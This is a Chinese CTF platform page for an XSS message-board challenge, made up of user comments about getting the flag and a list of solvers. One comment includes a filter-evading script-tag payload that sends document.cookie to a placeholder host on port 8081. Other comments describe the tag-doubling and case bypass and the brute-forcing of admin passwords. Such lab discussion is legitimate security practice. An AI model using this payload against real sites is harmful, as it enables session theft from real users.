留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 146
提  示: 需要xss平台接收flag
描  述:
flag{}
评论
cwscc 1天前

xss平台接收不到信息,有问题

回复 0

Jesen 29天前

2025年3月17日最新验证,本题获取flag没有问题,请检查是不是之前的payload没有闭合从而影响了后续js代码的正常加载

回复 0

Rannnn 29天前

换了四个XSS平台和自己搭的flask应用,连请求都收不到啊!!!

回复 0

ipconfig2023 1月前

题目有问题,希望修复一下,换了几个平台都收不到cookie,在自己服务器上运行的flask应用,收不到来自题目服务器的请求<scsCRiPtript>location.href="http://xx:8081/?flag_cookie="+document.cookie</scsCRiPtript>

回复 0

feifeifei1212 3月前

xss平台收不到

回复 0

燃燃然燃 4月前

自定义代码把XSS平台提供的图片https改成http有返回,但是看不到cookie。题目其实就是双写+大小写+空格绕过,对照WP复现XSS平台也没有回显,但是把同样的代码插入runoob的在线实例有回显,大概是环境有问题。

回复 1

我是CTF大王 5月前

这个题 爆破了十几万条弱密码 狗屁没有,肯定是长密码,怎么下一步

回复 0

我是CTF大王 5月前

没登录上去,拿cookie干鸡毛

回复 0

我是CTF大王 5月前

跟上个题目一样,都要登录admin才能拿到cookie,但是账密又改了,怎么获取admin密码???

回复 0

ailx10 6月前

很简单呀,https://zhuanlan.zhihu.com/p/839767477

回复 1

WriteUp

image
小蔡

5 金币

评分(3)

解题动态

cwscc 攻破了该题 1天前
shingu 攻破了该题 18天前
unigui 攻破了该题 20天前
tingsi464 攻破了该题 28天前
wechai 攻破了该题 1月前
李师傅 攻破了该题 2月前
happyfmy 攻破了该题 2月前
tfios 攻破了该题 2月前
CTFKnight 攻破了该题 2月前
yanzhenfeng 攻破了该题 2月前
Ktcc5 攻破了该题 2月前
vicleet 攻破了该题 3月前
派大星CTF 攻破了该题 3月前
a1104048658 攻破了该题 4月前
buggy 攻破了该题 4月前
blacklotus0 攻破了该题 4月前
distiny 攻破了该题 4月前
modeng 攻破了该题 5月前
minshenyao 攻破了该题 5月前
vnuesa 攻破了该题 5月前
问题反馈